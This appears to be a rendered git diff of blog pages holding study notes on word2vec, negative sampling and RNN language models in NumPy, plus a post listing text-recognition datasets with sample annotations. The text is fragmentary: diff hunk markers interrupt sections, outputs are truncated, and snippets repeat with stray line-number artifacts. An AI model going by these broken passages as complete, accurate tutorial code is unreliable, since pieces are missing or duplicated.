            [0.    1.807 0.    0.    0.    0.    0.   ]
             
            print(U[0]) # SVD
            [-3.409e-01 -1.110e-16 -3.886e-16 -1.205e-01  0.000e+00  9.323e-01
               2.226e-16]
             

The original sparse vector $W[0]$ has been transformed by SVD into the dense vector $U[0]$.

for word, word_id in word_to_id.items():
    plt.annotate(word, (U[word_id, 0], U[word_id, 1]))
plt.scatter(U[:,0], U[:,1], alpha=0.5)
plt.show()


[figure: words plotted by their first two SVD components]


2.4.4 The PTB Dataset

The PTB corpus we use is available on the web page of Tomas Mikolov, the inventor of word2vec. It is provided as text files and, compared with the original PTB articles, has undergone some preprocessing, such as replacing rare words with the special token unk (short for "unknown") and replacing concrete numbers with "N".

PTB download: http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz

            import sys
            sys.path.append('..')
            from dataset import ptb

            corpus, word_to_id, id_to_word = ptb.load_data('train')
            print('corpus size:', len(corpus))
            print('corpus[:30]:', corpus[:30])
            print()
            print('id_to_word[0]:', id_to_word[0])
            print('id_to_word[1]:', id_to_word[1])
            print('id_to_word[2]:', id_to_word[2])
            print()
            print("word_to_id['car']:", word_to_id['car'])
            print("word_to_id['happy']:", word_to_id['happy'])
            print("word_to_id['lexus']:", word_to_id['lexus'])
            corpus size: 929589
             corpus[:30]: [ 0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
              24 25 26 27 28 29]

2.4.5 Evaluation on the PTB Dataset

For large matrices it is advisable to use a faster SVD, which requires installing the sklearn module. The basic SVD (np.linalg.svd()) still works, but it needs far more time and memory.

import sys
sys.path.append('..')
import numpy as np
from common.util import most_similar, create_co_matrix, ppmi
from dataset import ptb

window_size = 2
wordvec_size = 100
corpus, word_to_id, id_to_word = ptb.load_data('train')
vocab_size = len(word_to_id)
print('counting co-occurrence ...')
C = create_co_matrix(corpus, vocab_size, window_size)
print('calculating PPMI ...')
W = ppmi(C, verbose=True)

print('calculating SVD ...')
try:
    # truncated SVD (fast!)
    from sklearn.utils.extmath import randomized_svd
    U, S, V = randomized_svd(W, n_components=wordvec_size, n_iter=5, random_state=None)
except ImportError:
    # SVD (slow)
    U, S, V = np.linalg.svd(W)

word_vecs = U[:, :wordvec_size]
querys = ['you', 'year', 'car', 'toyota']
for query in querys:
    most_similar(query, word_to_id, id_to_word, word_vecs, top=5)
            counting co-occurrence ...
             calculating PPMI ...
             


3.1.3 Processing Words in Neural Networks

We will process words with a neural network. However, a neural network cannot handle words like you or say directly; to process words, we first need to convert them into fixed-length vectors. One way to do this is the one-hot representation (one-hot vector), in which exactly one element is 1 and all the others are 0.

import numpy as np

c = np.array([[1, 0, 0, 0, 0, 0, 0]])  # input
W = np.random.randn(7, 3)  # weights
h = np.dot(c, W)  # intermediate node
print(h)
            [[-0.7200455  -0.12248471 -0.19002763]]
             

[figure: a one-hot vector transformed by a fully connected layer]


The neurons of the middle layer are the "average" of the values obtained by transforming each input layer through the fully connected layer.

If, after the fully connected layer, the first input layer is transformed to $h_1$ and the second to $h_2$, then the middle-layer neurons are $\frac{1}{2}(h_1+h_2)$.

The transformation from the input layer to the middle layer is done by a fully connected layer whose weights are $W_{in}$, a $7\times 3$ matrix. Spoiler: this weight matrix is exactly the distributed representation of the words we are after. Vectors obtained this way encode word meaning well. This is the big picture of word2vec.

import sys
sys.path.append('..')
import numpy as np
from common.layers import MatMul

# Sample context data
c0 = np.array([[1, 0, 0, 0, 0, 0, 0]])
c1 = np.array([[0, 0, 1, 0, 0, 0, 0]])

# Initial weights
W_in = np.random.randn(7, 3)
W_out = np.random.randn(3, 7)

# Create the layers
in_layer0 = MatMul(W_in)
in_layer1 = MatMul(W_in)
out_layer = MatMul(W_out)

# Forward propagation
h0 = in_layer0.forward(c0)
h1 = in_layer1.forward(c1)
h = 0.5 * (h0 + h1)
s = out_layer.forward(h)

print(s)
            [[-1.6202109   0.75824908 -0.05364709 -0.39814822 -0.37373042  0.51207421
                0.8510953 ]]
             

The input to the neural network used in word2vec is the contexts, and its correct labels are the words surrounded by those contexts, i.e., the target words.

Take each word in the corpus as a target word and extract the words around it as its contexts. Performing this operation for every word in the corpus (except those at both ends) yields contexts and target.

Convert the corpus text into word IDs:

            import sys
            sys.path.append('..')
            from common.util import preprocess

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)
            print(corpus)
            print(id_to_word)
            [0 1 2 3 4 1 5 6]
             {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}
             

Implement a function that generates contexts and target words:

def create_contexts_target(corpus, window_size=1):
    """
    corpus: list of word IDs
    window_size: context window size
    return: contexts and targets as NumPy arrays
    """
    # target[0] holds the 0th target word, target[1] the 1st, and so on.
    target = corpus[window_size:-window_size]
    # contexts is a two-dimensional array whose 0th axis holds the
    # individual contexts: contexts[0] is the 0th context, contexts[1]
    # the 1st context, and so on.
    contexts = []

    for idx in range(window_size, len(corpus)-window_size):
        cs = []
        for t in range(-window_size, window_size + 1):
            if t == 0:
                continue
            cs.append(corpus[idx + t])
        contexts.append(cs)
    return np.array(contexts), np.array(target)
            contexts, target = create_contexts_target(corpus, window_size=1)

            print(contexts)
            [[0 2]
              [1 3]
              [2 4]

3.3.2 Converting to One-hot Representation

[figure: converting contexts and target to one-hot representations]

            import sys
            sys.path.append('..')
            from common.util import preprocess, create_contexts_target, convert_one_hot

            text = 'You say goodbye and I say hello.'

            corpus, word_to_id, id_to_word = preprocess(text)

            contexts, target = create_contexts_target(corpus, window_size=1)

            vocab_size = len(word_to_id)
            target = convert_one_hot(target, vocab_size)
            contexts = convert_one_hot(contexts, vocab_size)
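convert_one_hot is provided by the book's common.util; a minimal sketch of what it might look like, assuming word IDs are integers in [0, vocab_size):

import numpy as np

def convert_one_hot(corpus, vocab_size):
    """Convert an array of word IDs (1-D or 2-D) into one-hot vectors."""
    N = corpus.shape[0]
    if corpus.ndim == 1:
        # e.g. target: shape (N,) -> (N, vocab_size)
        one_hot = np.zeros((N, vocab_size), dtype=np.int32)
        for idx, word_id in enumerate(corpus):
            one_hot[idx, word_id] = 1
    else:
        # e.g. contexts: shape (N, C) -> (N, C, vocab_size)
        C = corpus.shape[1]
        one_hot = np.zeros((N, C, vocab_size), dtype=np.int32)
        for idx0, word_ids in enumerate(corpus):
            for idx1, word_id in enumerate(word_ids):
                one_hot[idx0, idx1, word_id] = 1
    return one_hot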

3.4 Implementing the CBOW Model

[figure: SimpleCBOW network structure]

import sys
sys.path.append('..')
import numpy as np
from common.layers import MatMul, SoftmaxWithLoss

class SimpleCBOW:
    def __init__(self, vocab_size, hidden_size):
        """
        vocab_size: vocabulary size
        hidden_size: number of neurons in the middle layer
        """
        V, H = vocab_size, hidden_size

        # Initialize the weights (as 32-bit floats)
        W_in = 0.01 * np.random.randn(V, H).astype('f')
        W_out = 0.01 * np.random.randn(H, V).astype('f')

        # Create the layers
        self.in_layer0 = MatMul(W_in)
        self.in_layer1 = MatMul(W_in)
        self.out_layer = MatMul(W_out)
        self.loss_layer = SoftmaxWithLoss()

        # Collect all the weights and gradients into lists
        layers = [self.in_layer0, self.in_layer1, self.out_layer]
        self.params, self.grads = [], []
        for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

        # Expose the distributed representation of words as a member variable
        self.word_vecs = W_in


    def forward(self, contexts, target):
        """
        Forward propagation: takes contexts and target,
        and returns the loss.
        """
        h0 = self.in_layer0.forward(contexts[:, 0])
        h1 = self.in_layer1.forward(contexts[:, 1])
        h = (h0 + h1) * 0.5
        score = self.out_layer.forward(h)
        loss = self.loss_layer.forward(score, target)
        return loss


    def backward(self, dout=1):
        """
        Backward propagation
        """
        ds = self.loss_layer.backward(dout)
        da = self.out_layer.backward(ds)
        da *= 0.5
        self.in_layer1.backward(da)
        self.in_layer0.backward(da)
        return None

Implementing the training

Training the CBOW model is exactly the same as training an ordinary neural network: first prepare the training data, then compute the gradients and update the weight parameters step by step.

            import sys
            sys.path.append('..')
            from common.trainer import Trainer
            from common.optimizer import Adam
            from common.util import preprocess, create_contexts_target, convert_one_hot

            window_size = 1
            hidden_size = 5
            batch_size = 3
            max_epoch = 1000

            text = 'You say goodbye and I say hello.'
            corpus, word_to_id, id_to_word = preprocess(text)

            vocab_size = len(word_to_id)
            contexts, target = create_contexts_target(corpus, window_size)
            target = convert_one_hot(target, vocab_size)
            contexts = convert_one_hot(contexts, vocab_size)

            model = SimpleCBOW(vocab_size, hidden_size)
            optimizer = Adam()
            trainer = Trainer(model, optimizer)
            trainer.fit(contexts, target, max_epoch, batch_size)
            trainer.plot()

[figure: training loss]

Inspect the learned weight parameters:

word_vecs = model.word_vecs
for word_id, word in id_to_word.items():
    print(word, word_vecs[word_id])
            you [-0.9274265  -0.91214865 -0.9109259   0.8992449  -1.6783223 ]
             say [ 1.1131934  1.0601219  1.1271317 -1.1453978 -1.2170266]
             goodbye [-0.9434733  -0.9451493  -1.0034578   1.0183493   0.01961206]


4.1.1 The Embedding Layer

4.1.2 Implementing the Embedding Layer

Extracting a particular row from a matrix is easy to implement. Suppose the weight W is a two-dimensional NumPy array; to extract a specific row, just write W[2] or W[5].

            import numpy as np
            W = np.arange(21).reshape(7, 3)
            W
array([[ 0,  1,  2],
       [ 3,  4,  5],
       [ 6,  7,  8],
       [ 9, 10, 11],
       [12, 13, 14],
       [15, 16, 17],
       [18, 19, 20]])

            W[2]
array([6, 7, 8])

            idx = np.array([1, 0, 3, 0])
            W[idx]
            array([[ 3,  4,  5],
                    [ 0,  1,  2],
                    [ 9, 10, 11],
                    [ 0,  1,  2]])
             

Implement the Embedding layer's forward() and backward() methods:

class Embedding:
    def __init__(self, W):
        """
        Keep params and grads as member variables.
        """
        self.params = [W]
        self.grads = [np.zeros_like(W)]
        self.idx = None


    def forward(self, idx):
        """
        Store the indices of the rows to extract (the word IDs) in the
        member variable idx. During backpropagation, the gradient from
        the upstream (output-side) layer is passed through unchanged to
        the downstream (input-side) layer; however, it is applied only
        to the specific rows (idx) of the weight gradient dW.
        """
        W, = self.params
        self.idx = idx
        out = W[idx]
        return out


    def backward(self, dout):
        dW, = self.grads
        dW[...] = 0

        # dW[self.idx] = dout would be a poor choice: when idx contains
        # duplicate elements, one of the written values would simply be
        # overwritten instead of accumulated.
        for i, word_id in enumerate(self.idx):
            dW[word_id] += dout[i]
        # Or equivalently:
        # np.add.at(dW, self.idx, dout)
        return None
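To see why plain assignment fails when idx contains duplicates while accumulation works, here is a small demonstration (toy values chosen for illustration):

import numpy as np

dW = np.zeros((4, 3))
idx = np.array([0, 2, 0])   # index 0 appears twice
dout = np.ones((3, 3))

dW[idx] = dout              # assignment: the second write to row 0
print(dW[0])                # overwrites the first -> [1. 1. 1.]

dW[...] = 0
np.add.at(dW, idx, dout)    # accumulation: both contributions add up
print(dW[0])                # -> [2. 2. 2.]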

4.2 Improving word2vec (Part 2)

We adopt a method called **negative sampling** as the solution. Using negative sampling in place of Softmax keeps the computational cost low and roughly constant no matter how large the vocabulary grows.

4.2.1 The Computation Problem After the Middle Layer


4.2.4 From Multi-class to Binary Classification: Implementation

Introduce an Embedding Dot layer, which combines the Embedding layer with the dot (inner product) operation.

class EmbeddingDot:
    def __init__(self, W):
        """
        params: holds the parameters
        grads: holds the gradients
        embed: holds an Embedding layer
        cache: holds intermediate results of the forward pass
        """
        self.embed = Embedding(W)
        self.params = self.embed.params
        self.grads = self.embed.grads
        self.cache = None


    def forward(self, h, idx):
        target_W = self.embed.forward(idx)
        out = np.sum(target_W * h, axis=1)
        self.cache = (h, target_W)
        return out


    def backward(self, dout):
        h, target_W = self.cache
        dout = dout.reshape(dout.shape[0], 1)
        dtarget_W = dout * h
        self.embed.backward(dtarget_W)
        dh = dout * target_W
        return dh
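A quick usage sketch with toy values (the shapes and numbers here are illustrative assumptions): for a mini-batch of 3 hidden vectors and 3 target word IDs, forward() returns one score per example.

import numpy as np

W = np.arange(21).reshape(7, 3).astype('f')  # 7 words, 3-dim embeddings
layer = EmbeddingDot(W)

h = np.ones((3, 3), dtype='f')   # mini-batch of 3 hidden vectors
idx = np.array([0, 3, 1])        # target word ID for each example

out = layer.forward(h, idx)      # row-wise dot of W[idx] with h
print(out)                       # [ 3. 30. 12.]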

4.2.5 Negative Sampling

[figure: negative sampling]

So far we have only learned from the positive example (the correct answer); we do not yet know what results the negative examples (incorrect answers) would produce.



4.2.6 The Sampling Method of Negative Sampling

Compute a probability distribution from each word's frequency in the corpus, then simply sample according to that distribution. Sampling this way means words that appear often in the corpus are easy to draw, while "rare words" are hard to draw.

Let's illustrate probability-based sampling with Python:

# Randomly pick one number from 0 to 9
np.random.choice(10)
            4
             
# Randomly pick one element from the words list
words = ['you', 'say', 'goodbye', 'I', 'hello', '.']
np.random.choice(words)
            +
            1
            2
            3
            # 从 words 列表中随机选择一个元素
            words = ['you', 'say', 'goodbye', 'I', 'hello', '.']
            np.random.choice(words)
            'goodbye'
             
            -
            # 有放回采样 5 次
            np.random.choice(words, size=5)
            +
            1
            2
            # 有放回采样 5 次
            np.random.choice(words, size=5)
            array(['you', '.', 'say', 'hello', 'say'], dtype='<U7')
             
            -
            # 无放回采样 5 次
            np.random.choice(words, size=5, replace=False)
            +
            1
            2
            # 无放回采样 5 次
            np.random.choice(words, size=5, replace=False)
            array(['goodbye', 'I', 'say', 'you', 'hello'], dtype='<U7')
             
            -
            # 基于概率分布进行采样
            p = [0.5, 0.1, 0.05, 0.2, 0.05, 0.1]
            np.random.choice(words, p=p)
            +
            1
            2
            3
            # 基于概率分布进行采样
            p = [0.5, 0.1, 0.05, 0.2, 0.05, 0.1]
            np.random.choice(words, p=p)
            'I'
             

The negative sampling proposed in word2vec adds one more step to this distribution: as shown below, the original probabilities are raised to the power 0.75.

$$P'(w_i)=\frac{P(w_i)^{0.75}}{\sum_j^n P(w_j)^{0.75}}$$

This is done so that low-frequency words are not ignored entirely. More precisely, raising the probabilities to the power 0.75 slightly increases the probability of rare words.

p = [0.7, 0.29, 0.01]
new_p = np.power(p, 0.75)
new_p /= np.sum(new_p)
print(new_p)
[0.64196878 0.33150408 0.02652714]

In this example, an element whose probability was 0.01 (1%) before the transformation ends up at about 0.026 (2.6%) after it. Raising to the power 0.75 thus acts as a corrective measure that makes low-frequency words slightly easier to draw.

Note that the value 0.75 has no theoretical justification; other values can be used as well.

corpus = np.array([0, 1, 2, 3, 4, 1, 2, 3])
power = 0.75
sample_size = 2
# get_negative_sample() treats the word IDs in `target` as positive
# examples and samples negative examples from the remaining word IDs.
sampler = UnigramSampler(corpus, power, sample_size)
target = np.array([1, 3, 0])
negative_sample = sampler.get_negative_sample(target)
print(negative_sample)
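UnigramSampler itself comes from the book's ch04/negative_sampling_layer.py. A minimal sketch of the idea it implements (counts raised to a power, normalized, then sampled per target while excluding the positive example) might look like this; it is simplified and assumes word IDs run contiguously from 0, and omits the book's GPU path:

import collections
import numpy as np

class UnigramSampler:
    def __init__(self, corpus, power, sample_size):
        counts = collections.Counter(corpus)
        self.vocab_size = len(counts)      # assumes IDs 0 .. vocab_size-1 all occur
        self.sample_size = sample_size
        p = np.array([counts[i] for i in range(self.vocab_size)], dtype=np.float64)
        p = np.power(p, power)             # dampen the distribution
        self.word_p = p / np.sum(p)

    def get_negative_sample(self, target):
        batch_size = target.shape[0]
        negative_sample = np.zeros((batch_size, self.sample_size), dtype=np.int32)
        for i in range(batch_size):
            p = self.word_p.copy()
            p[target[i]] = 0               # never draw the positive example
            p /= p.sum()
            negative_sample[i] = np.random.choice(
                self.vocab_size, size=self.sample_size, replace=False, p=p)
        return negative_sample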

4.2.7 Implementing negative sampling

class NegativeSamplingLoss:
    def __init__(self, W, corpus, power=0.75, sample_size=5):
        self.sample_size = sample_size
        self.sampler = UnigramSampler(corpus, power, sample_size)
        self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size + 1)]
        self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size + 1)]
        self.params, self.grads = [], []
        for layer in self.embed_dot_layers:
            self.params += layer.params
            self.grads += layer.grads

    def forward(self, h, target):
        """
        h: hidden-layer neurons
        target: positive-example targets
        """
        batch_size = target.shape[0]
        # Sample negative examples with self.sampler
        negative_sample = self.sampler.get_negative_sample(target)

        # Forward pass for the positive example
        score = self.embed_dot_layers[0].forward(h, target)
        correct_label = np.ones(batch_size, dtype=np.int32)  # label 1 for positives
        loss = self.loss_layers[0].forward(score, correct_label)

        # Forward pass for the negative examples
        negative_label = np.zeros(batch_size, dtype=np.int32)  # label 0 for negatives
        for i in range(self.sample_size):
            negative_target = negative_sample[:, i]
            score = self.embed_dot_layers[1 + i].forward(h, negative_target)
            loss += self.loss_layers[1 + i].forward(score, negative_label)

        return loss

    def backward(self, dout=1):
        dh = 0
        for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):
            # Call each layer's backward() in the reverse order of the forward
            # pass (SigmoidWithLoss first, then its paired EmbeddingDot).
            dscore = l0.backward(dout)
            dh += l1.backward(dscore)
        return dh

4.3 Training the improved word2vec

4.3.1 Implementing the CBOW model


import sys
sys.path.append('..')
from common.np import *  # import numpy as np
from common.layers import Embedding
from ch04.negative_sampling_layer import NegativeSamplingLoss


class CBOW:
    def __init__(self, vocab_size, hidden_size, window_size, corpus):
        V, H = vocab_size, hidden_size

        # Initialize the weights
        W_in = 0.01 * np.random.randn(V, H).astype('f')
        W_out = 0.01 * np.random.randn(V, H).astype('f')

        # Create the layers
        self.in_layers = []
        for i in range(2 * window_size):
            layer = Embedding(W_in)  # use an Embedding layer
            self.in_layers.append(layer)
        self.ns_loss = NegativeSamplingLoss(W_out, corpus, power=0.75, sample_size=5)

        # Gather all weights and gradients into lists
        layers = self.in_layers + [self.ns_loss]
        self.params, self.grads = [], []
        for layer in layers:
            self.params += layer.params
            self.grads += layer.grads

        # Store the distributed word representations as a member variable
        self.word_vecs = W_in

    def forward(self, contexts, target):
        h = 0
        for i, layer in enumerate(self.in_layers):
            h += layer.forward(contexts[:, i])
        h *= 1 / len(self.in_layers)  # average the context vectors
        loss = self.ns_loss.forward(h, target)
        return loss

    def backward(self, dout=1):
        dout = self.ns_loss.backward(dout)
        dout *= 1 / len(self.in_layers)
        for layer in self.in_layers:
            layer.backward(dout)
        return None

4.3.2 Training code for the CBOW model

import sys
sys.path.append('..')
import numpy as np
from common import config
# To run on GPU, enable the line below (requires cupy)
# ===============================================
config.GPU = True
# ===============================================
import pickle
from common.trainer import Trainer
from common.optimizer import Adam
from common.util import create_contexts_target, to_cpu, to_gpu
from dataset import ptb

# Hyperparameters
window_size = 5
hidden_size = 100
batch_size = 100
max_epoch = 10

# Load the data
corpus, word_to_id, id_to_word = ptb.load_data('train')
vocab_size = len(word_to_id)

contexts, target = create_contexts_target(corpus, window_size)
if config.GPU:
    contexts, target = to_gpu(contexts), to_gpu(target)

# Build the model, optimizer, and trainer
model = CBOW(vocab_size, hidden_size, window_size, corpus)
optimizer = Adam()
trainer = Trainer(model, optimizer)

# Train
trainer.fit(contexts, target, max_epoch, batch_size)
trainer.plot()

# Save what is needed for later use
word_vecs = model.word_vecs
if config.GPU:
    word_vecs = to_cpu(word_vecs)
params = {}
params['word_vecs'] = word_vecs.astype(np.float16)
params['word_to_id'] = word_to_id
params['id_to_word'] = id_to_word
pkl_file = 'cbow_params.pkl'
with open(pkl_file, 'wb') as f:
    pickle.dump(params, f, -1)

4.3.3 Evaluating the CBOW model

import sys
sys.path.append('..')
from common.util import most_similar
import pickle

pkl_file = 'cbow_params.pkl'
with open(pkl_file, 'rb') as f:
    params = pickle.load(f)
word_vecs = params['word_vecs']
word_to_id = params['word_to_id']
id_to_word = params['id_to_word']

querys = ['you', 'year', 'car', 'toyota']
for query in querys:
    most_similar(query, word_to_id, id_to_word, word_vecs, top=5)

4.4 Other topics related to word2vec

4.4.1 Example applications of word2vec

In natural language processing, the reason distributed word representations are so important lies in transfer learning: knowledge learned in one domain can be applied to other domains.

            @@ -4487,6 +4485,8 @@

diff --git "a/posts/DL-深度学习进阶-自然语言处理-5-RNN/index.html" "b/posts/DL-深度学习进阶-自然语言处理-5-RNN/index.html"
index e41cabe005..4a31953a7f 100644
@@ -449,10 +447,10 @@


            $$h_t=\tanh(h_{t-1}W_h+x_tW_x+b)$$

class RNN:
    def __init__(self, Wx, Wh, b):
        self.params = [Wx, Wh, b]
        self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]
        self.cache = None

    def forward(self, x, h_prev):
        """
        x: input arriving from below
        h_prev: input arriving from the left (the previous hidden state)
        """
        Wx, Wh, b = self.params
        t = np.dot(h_prev, Wh) + np.dot(x, Wx) + b
        h_next = np.tanh(t)
        self.cache = (x, h_prev, h_next)
        # The output of the RNN layer at the current time step
        # (= the input of the RNN layer at the next time step) is h_next
        return h_next

    def backward(self, dh_next):
        Wx, Wh, b = self.params
        x, h_prev, h_next = self.cache

        dt = dh_next * (1 - h_next ** 2)  # derivative of tanh
        db = np.sum(dt, axis=0)
        dWh = np.dot(h_prev.T, dt)
        dh_prev = np.dot(dt, Wh.T)
        dWx = np.dot(x.T, dt)
        dx = np.dot(dt, Wx.T)

        self.grads[0][...] = dWx
        self.grads[1][...] = dWh
        self.grads[2][...] = db
        return dx, dh_prev

5.3.2 Implementing the Time RNN layer

A Time RNN layer is a network of T RNN layers connected in sequence. We implement this network as the TimeRNN layer; the hidden state h of the RNN layers is kept in a member variable.

class TimeRNN:
    def __init__(self, Wx, Wh, b, stateful=False):
        """
        layers: list holding the T RNN layers
        h: hidden state of the last RNN layer after forward() is called
        """
        self.params = [Wx, Wh, b]
        self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]
        self.layers = None
        self.h, self.dh = None, None
        self.stateful = stateful

    def set_state(self, h):
        self.h = h

    def reset_state(self):
        self.h = None

    def forward(self, xs):
        Wx, Wh, b = self.params
        N, T, D = xs.shape
        D, H = Wx.shape

        self.layers = []
        hs = np.empty((N, T, H), dtype='f')

        if not self.stateful or self.h is None:
            self.h = np.zeros((N, H), dtype='f')

        for t in range(T):
            layer = RNN(*self.params)
            self.h = layer.forward(xs[:, t, :], self.h)
            hs[:, t, :] = self.h
            self.layers.append(layer)
        return hs

    def backward(self, dhs):
        Wx, Wh, b = self.params
        N, T, H = dhs.shape
        D, H = Wx.shape

        dxs = np.empty((N, T, D), dtype='f')
        dh = 0
        grads = [0, 0, 0]
        for t in reversed(range(T)):
            layer = self.layers[t]
            dx, dh = layer.backward(dhs[:, t, :] + dh)  # summed gradient
            dxs[:, t, :] = dx

            for i, grad in enumerate(layer.grads):
                grads[i] += grad

        for i, grad in enumerate(grads):
            self.grads[i][...] = grad
        self.dh = dh

        return dxs
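A quick shape check of the layer (illustrative sizes, not from the book): an input xs of shape (N, T, D) produces hidden states hs of shape (N, T, H), and with stateful=True the next forward() call continues from self.h.

import numpy as np

N, T, D, H = 2, 5, 4, 3          # batch, time steps, input dim, hidden dim
Wx = np.random.randn(D, H).astype('f')
Wh = np.random.randn(H, H).astype('f')
b = np.zeros(H).astype('f')

layer = TimeRNN(Wx, Wh, b, stateful=True)
xs = np.random.randn(N, T, D).astype('f')
hs = layer.forward(xs)
print(hs.shape)                  # (2, 5, 3)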

5.4 Implementing layers that handle time-series data

We call a language model based on an RNN an RNNLM (RNN Language Model).

5.4.1 The big picture of an RNNLM

            @@ -461,7 +459,7 @@

5.5 Training and evaluating an RNNLM

5.5.1 Implementing an RNNLM

import sys
sys.path.append('..')
import numpy as np
from common.time_layers import *


class SimpleRnnlm:
    def __init__(self, vocab_size, wordvec_size, hidden_size):
        V, D, H = vocab_size, wordvec_size, hidden_size
        rn = np.random.randn
        # Initialize the weights
        embed_W = (rn(V, D) / 100).astype('f')
        rnn_Wx = (rn(D, H) / np.sqrt(D)).astype('f')
        rnn_Wh = (rn(H, H) / np.sqrt(H)).astype('f')
        rnn_b = np.zeros(H).astype('f')
        affine_W = (rn(H, V) / np.sqrt(H)).astype('f')
        affine_b = np.zeros(V).astype('f')

        # Create the layers
        self.layers = [
            TimeEmbedding(embed_W),
            TimeRNN(rnn_Wx, rnn_Wh, rnn_b, stateful=True),
            TimeAffine(affine_W, affine_b)
        ]
        self.loss_layer = TimeSoftmaxWithLoss()
        self.rnn_layer = self.layers[1]

        # Gather all weights and gradients into lists
        self.params, self.grads = [], []
        for layer in self.layers:
            self.params += layer.params
            self.grads += layer.grads

    def forward(self, xs, ts):
        for layer in self.layers:
            xs = layer.forward(xs)
        loss = self.loss_layer.forward(xs, ts)
        return loss

    def backward(self, dout=1):
        dout = self.loss_layer.backward(dout)
        for layer in reversed(self.layers):
            dout = layer.backward(dout)
        return dout

    def reset_state(self):
        self.rnn_layer.reset_state()

5.5.2 Evaluating a language model

**Perplexity** is commonly used as a metric of a language model's predictive performance. Perplexity can be read as the reciprocal of the probability (this interpretation is exact when the amount of data is 1).
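For a whole dataset, perplexity is e raised to the average cross-entropy loss L, which is exactly how the training loop below turns total_loss / loss_count into ppl. A tiny illustrative calculation (the probabilities are made up):

import numpy as np

# Probabilities the model assigned to the correct next words
probs = np.array([0.5, 0.25, 0.1])

L = -np.mean(np.log(probs))   # average cross-entropy loss
ppl = np.exp(L)               # perplexity = e^L
print(ppl)                    # ~4.31: on average the model is as uncertain
                              # as a uniform choice among ~4.3 candidate words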

            @@ -476,7 +474,7 @@

Next we train on the PTB dataset, but using only the first 1000 words of the training split. This is because with the RNNLM implemented in this section, even the full training data would not yield good results.

import sys
sys.path.append('..')
import matplotlib.pyplot as plt
import numpy as np
from common.optimizer import SGD
from dataset import ptb


# Hyperparameters
batch_size = 10
wordvec_size = 100
hidden_size = 100
time_size = 5  # time span for Truncated BPTT
lr = 0.1
max_epoch = 100

# Load the training data (shrunk dataset)
corpus, word_to_id, id_to_word = ptb.load_data('train')
corpus_size = 1000
corpus = corpus[:corpus_size]
vocab_size = int(max(corpus) + 1)

xs = corpus[:-1]  # inputs
ts = corpus[1:]   # outputs (supervision labels)
data_size = len(xs)
print('corpus size: %d, vocabulary size: %d' % (corpus_size, vocab_size))

# Variables used during training
max_iters = data_size // (batch_size * time_size)
time_idx = 0
total_loss = 0
loss_count = 0
ppl_list = []

# Build the model
model = SimpleRnnlm(vocab_size, wordvec_size, hidden_size)
optimizer = SGD(lr)

# Compute the start offset of each sample within the mini-batch
jump = (corpus_size - 1) // batch_size
offsets = [i * jump for i in range(batch_size)]

for epoch in range(max_epoch):
    for iter in range(max_iters):
        # Fetch a mini-batch
        batch_x = np.empty((batch_size, time_size), dtype='i')
        batch_t = np.empty((batch_size, time_size), dtype='i')
        for t in range(time_size):
            for i, offset in enumerate(offsets):
                batch_x[i, t] = xs[(offset + time_idx) % data_size]
                batch_t[i, t] = ts[(offset + time_idx) % data_size]
            time_idx += 1

        # Compute the gradients and update the parameters
        loss = model.forward(batch_x, batch_t)
        model.backward()
        optimizer.update(model.params, model.grads)
        total_loss += loss
        loss_count += 1

    # Evaluate perplexity once per epoch
    ppl = np.exp(total_loss / loss_count)
    print('| epoch %d | perplexity %.2f' % (epoch + 1, ppl))
    ppl_list.append(float(ppl))
    total_loss, loss_count = 0, 0

# Plot the result
x = np.arange(len(ppl_list))
plt.plot(x, ppl_list, label='train')
plt.xlabel('epochs')
plt.ylabel('perplexity')
plt.show()
        corpus size: 1000, vocabulary size: 418
         | epoch 1 | perplexity 381.82
         | epoch 2 | perplexity 249.18
        @@ -4531,6 +4529,8 @@ 

diff --git "a/posts/Dataset-收集一下文本的各种数据集/index.html" "b/posts/Dataset-收集一下文本的各种数据集/index.html"
index a9cbf5ae21..4efced0bba 100644
@@ -455,7 +453,7 @@

        0000172.jpg
{"annotations": [[
  {
    "adjusted_bbox": [140.26028096262758, 897.1957001682758, 22.167573140645146, 38.36424196832945],
    "attributes": ["distorted", "raised"],
    "is_chinese": true,
    "polygon": [[140.26028096262758, 896.7550603352049], [162.42785410327272, 898.0769798344178], [162.42785410327272, 935.7929346470926], [140.26028096262758, 935.0939571156308]],
    "text": "\u660e"
  },
  {
    "adjusted_bbox": [162.42785410327272, 898.5416545674744, 23.376713493771263, 37.74268246537315],
    "attributes": ["distorted", "raised"],
    "is_chinese": true,
    "polygon": [[162.42785410327272, 898.0769798344178], [185.80456759704398, 899.4710040335876], [185.80456759704398, 936.5300382257251], [162.42785410327272, 935.7929346470926]],
    "text": "\u6d77"
  },
  ……
"image_id": "0000172", "width": 2048}

The corresponding annotation; every character has:

@@ -502,7 +500,7 @@

          17_18.jpg

The corresponding ground truth: one text box per word, plus additional information such as the address and surroundings:

<image>
  <imageName>img/17_18.jpg</imageName>
  <address>420 South 1st Street San Jose CA 95112</address>
  <lex>SOUTH,FIRST,BILLIARDS,CLUB,AND,LOUNGE,AGENDA,RESTAURANT,BAR,RAMADA,LIMITED,SAN,JOSE,WET,NIGHTCLUB,MOTIF,ANNO,DOMINI,EULIPIA,DOWNTOWN,YOGA,SHALA,WHIPSAW,INC,ZOE,SAINTE,CLAIRE,HOTEL,SCORES,SPORTS,GRILL,WORKS,SPY,MUSEUM,QUILTS,TEXTILES,MIAMI,BEACH,STAGE,COMPANY,CACTUS,ANGELS,DAI,THANH,SUPERMARKET</lex>
  <Resolution x="1024" y="768"/>
  <taggedRectangles>
    <taggedRectangle height="41" width="152" x="480" y="403">
      <tag>BILLIARDS</tag>
    </taggedRectangle>
    <taggedRectangle height="33" width="78" x="407" y="410">
      <tag>FIRST</tag>
    </taggedRectangle>
    <taggedRectangle height="30" width="85" x="322" y="416">
      <tag>SOUTH</tag>
    </taggedRectangle>
  </taggedRectangles>
</image>

          ICDAR

Resources:

            @@ -518,9 +516,9 @@

            img_1.jpg

